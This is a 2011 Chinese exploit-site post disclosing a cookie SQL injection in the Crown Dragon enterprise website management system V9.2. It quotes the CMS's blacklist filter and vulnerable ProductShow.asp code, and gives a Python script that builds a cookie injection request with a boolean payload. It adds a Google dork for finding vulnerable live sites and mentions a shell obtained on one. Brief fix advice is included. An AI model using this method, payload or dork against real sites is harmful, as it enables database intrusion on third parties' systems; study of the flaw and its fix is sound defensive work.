Crown Dragon Technology enterprise website management system V9.2 vulnerability - vulnerability warning - the black bar safety net

2011-06-12T00:00:00
ID MYHACK58:62201130832
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-06-12T00:00:00

Description

A busy day today, so I am posting a vulnerability quickly.

Crown Dragon Technology enterprise website management system V9.2 cookie injection vulnerability

Vulnerable files: Shownews.asp, ProductShow.asp, DownloadShow1.asp, MovieShow.asp

Problem code:

First, the anti-injection script, Check_Sql.asp:

<%
Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name
'------ Definition section: head ----------------------------------------------------------------------
Err_Message = 1 'handling mode: 1=alert, 2=redirect, 3=alert and then redirect
Err_Web = "Err.Asp" 'page to redirect to on error
Query_Badword="'∥and∥select∥update∥chr∥delete∥%20from∥;∥insert∥mid∥master.∥ set∥chr(37)∥="
'this part defines the illegal GET parameters, separated by "∥"
Form_Badword="'∥%∥&∥*∥#∥(∥)∥=" 'this part defines the illegal POST parameters, separated by "∥"
'------ Definition section: tail -----------------------------------------------------------------------
' On Error Resume Next

'----- Filter the query-string values.
if request.QueryString<>"" then
    Chk_badword=split(Query_Badword,"∥")
    FOR EACH Query_Name IN Request.QueryString
        for i=0 to ubound(Chk_badword)
            If Instr(LCase(request.QueryString(Query_Name)),Chk_badword(i))<>0 Then
                Select Case Err_Message
                    Case "1"
                        Response.Write "<Script Language=JavaScript>alert('Parameter error! The value of parameter "&name&" contains an illegal string!\n\nPlease do not use: and update , delete ; insert mid master or other illegal characters in parameters!'); window.close();</Script>"
                    Case "2"
                        Response.Write "<Script Language=JavaScript>location.href='"& Err_Web&"'</Script>"
                    Case "3"
                        Response.Write "<Script Language=JavaScript>alert('Parameter error! The value of parameter "&name&" contains an illegal string!\n\nPlease do not use: and update , delete ; insert mid master or other illegal characters in parameters!'); location.href='"& Err_Web&"';</Script>"
                End Select
                Response.End
            End If
        NEXT
    NEXT
End if

'----- Filter the POST form values.
if request.form<>"" then
    Chk_badword=split(Form_Badword,"∥")
    FOR EACH name IN Request.Form
        for i=0 to ubound(Chk_badword)
            If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then
                Select Case Err_Message
                    Case "1"
                        Response.Write "<Script Language=JavaScript>alert('Error! The value of form field "&name&" contains an illegal string!\n\nPlease do not use: % & * # ( ) or other illegal characters in the form!'); window.close();</Script>"
                    Case "2"
                        Response.Write "<Script Language=JavaScript>location.href='"& Err_Web&"'</Script>"
                    Case "3"
                        Response.Write "<Script Language=JavaScript>alert('Error! The value of parameter "&name&" contains an illegal string!\n\nPlease do not use: % & * # ( ) or other illegal characters in the form!'); location.href='"& Err_Web&"';</Script>"
                End Select
                Response.End
            End If
        NEXT
    NEXT
end if
%>

As can be seen, only Request.QueryString and Request.Form are filtered; Request.Cookies is never checked, so anything supplied in a cookie passes the anti-injection script untouched.

The vulnerable code in these four files is identical, so ProductShow.asp is used as the example here:

-------------------------------------------------- The code above is omitted --------------------------------------------------
<%
ShowSmallClassType=ShowSmallClassType_Article
dim ID
ID=trim(request("ID"))    'The problem is here: request("ID") names no collection, so classic ASP searches QueryString, then Form, then Cookies; a value supplied only in a cookie bypasses the anti-injection script
if ID="" then
    response.Redirect("Product.asp")    'if the id parameter is empty, redirect to Product.asp
end if
sql="select * from Product where ID=" & ID & ""    'id is concatenated straight into the query, with no numeric check
Set rs= Server.CreateObject("ADODB.Recordset")
rs.open sql,conn,1,3
if rs.bof and rs.eof then
    response.write"<SCRIPT language=JavaScript>alert('cannot find this product!');"
    response.write"javascript:history.go(-1)</SCRIPT>"
else
    rs("Hits")=rs("Hits")+1
    rs.update
%>

For exploitation you can use an injection relay script (a local page that forwards the payload in the Cookie header), or GreenBrowser with its JS plugin for cookie injection. I do not have GreenBrowser installed here, so I am using an injection relay as the example.
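As an added example (not code from the CMS or from the author of this write-up), the following Python models the two pieces shown above: the Check_Sql.asp blacklist over the query string and form, and classic ASP's unqualified Request("ID") lookup, which searches QueryString, then Form, then Cookies. It then builds the raw request an injection relay would send. The host www.example.com, the path, the payload `1 and 1=2` and the function names are assumptions made for illustration.

```python
"""Model of the Check_Sql.asp bypass through the Request("ID") cookie fallback.

Added example; not code from the CMS or from the advisory author. The
blacklists are copied from Check_Sql.asp, the lookup order is classic ASP's
documented order for an unqualified Request(name), and the host, path,
payload and function names are assumptions made for illustration.
"""
from urllib.parse import parse_qs, quote

# Blacklists copied from Check_Sql.asp (separated by "∥" in the original).
QUERY_BADWORDS = "'∥and∥select∥update∥chr∥delete∥%20from∥;∥insert∥mid∥master.∥ set∥chr(37)∥=".split("∥")
FORM_BADWORDS = "'∥%∥&∥*∥#∥(∥)∥=".split("∥")


def check_sql(query_string: str, form_body: str) -> bool:
    """Return True if Check_Sql.asp would let the request through.

    Mirrors the original: each decoded query-string value is lower-cased and
    searched for every Query_Badword with Instr(); form values are checked
    against Form_Badword. Request.Cookies is never looked at.
    """
    for values in parse_qs(query_string, keep_blank_values=True).values():
        if any(bad in v.lower() for v in values for bad in QUERY_BADWORDS):
            return False
    for values in parse_qs(form_body, keep_blank_values=True).values():
        if any(bad in v.lower() for v in values for bad in FORM_BADWORDS):
            return False
    return True


def asp_request(name: str, query_string: str, form_body: str, cookies: dict) -> str:
    """Classic ASP Request(name) with no collection given: QueryString first,
    then Form, then Cookies (ClientCertificate and ServerVariables come after
    and are omitted here). Returns "" when the name appears nowhere, which is
    what the if ID="" test in ProductShow.asp checks for."""
    qs = parse_qs(query_string, keep_blank_values=True)
    if name in qs:
        return qs[name][0]
    form = parse_qs(form_body, keep_blank_values=True)
    if name in form:
        return form[name][0]
    return cookies.get(name, "")


def product_show_sql(query_string: str, form_body: str, cookies: dict):
    """Simulate ProductShow.asp behind Check_Sql.asp.

    Returns the SQL string that would be handed to ADODB, or None when the
    request is stopped earlier (Response.End in Check_Sql.asp, or the
    redirect to Product.asp for an empty ID).
    """
    if not check_sql(query_string, form_body):
        return None
    id_value = asp_request("ID", query_string, form_body, cookies).strip()
    if id_value == "":
        return None
    # Same concatenation as ProductShow.asp: sql="select * from Product where ID=" & ID & ""
    return "select * from Product where ID=" + id_value


def cookie_injection_request(host: str, path: str, payload: str) -> str:
    """Raw HTTP request an injection relay would send: no ID in the URL or
    body, so Request("ID") falls through to the cookie. The value is
    URL-encoded because Request.Cookies decodes %xx escapes on the server."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: ID={quote(payload)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )


# Illustrative boolean test payload (an assumption, not taken from the advisory).
PAYLOAD = "1 and 1=2"

if __name__ == "__main__":
    # Payload in the query string: Check_Sql.asp sees "and" and "=" and stops it.
    print(product_show_sql("ID=1+and+1%3D2", "", {}))
    # Same payload only in a cookie: nothing filters it and it reaches the database.
    print(product_show_sql("", "", {"ID": PAYLOAD}))
    print(cookie_injection_request("www.example.com", "/ProductShow.asp", PAYLOAD))
```

Run as-is, the payload that Check_Sql.asp blocks in the query string reaches ADODB untouched when it arrives only in a cookie. Note that the relay must leave ID out of the URL and body: if ID=1 is present in the query string, Request("ID") stops there and the cookie is never read. On the ASP side the fix is to read Request.QueryString("ID") explicitly and reject anything that is not numeric (IsNumeric followed by CLng), or better, to use a parameterised ADODB.Command; extending Check_Sql.asp to walk Request.Cookies closes this particular hole but leaves the keyword blacklist itself as weak as before.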

Local test: [screenshot]

Internet test: Google for inurl:HrDemandAccept.asp [screenshots]

This shell is for everyone to see; don't do anything bad with it~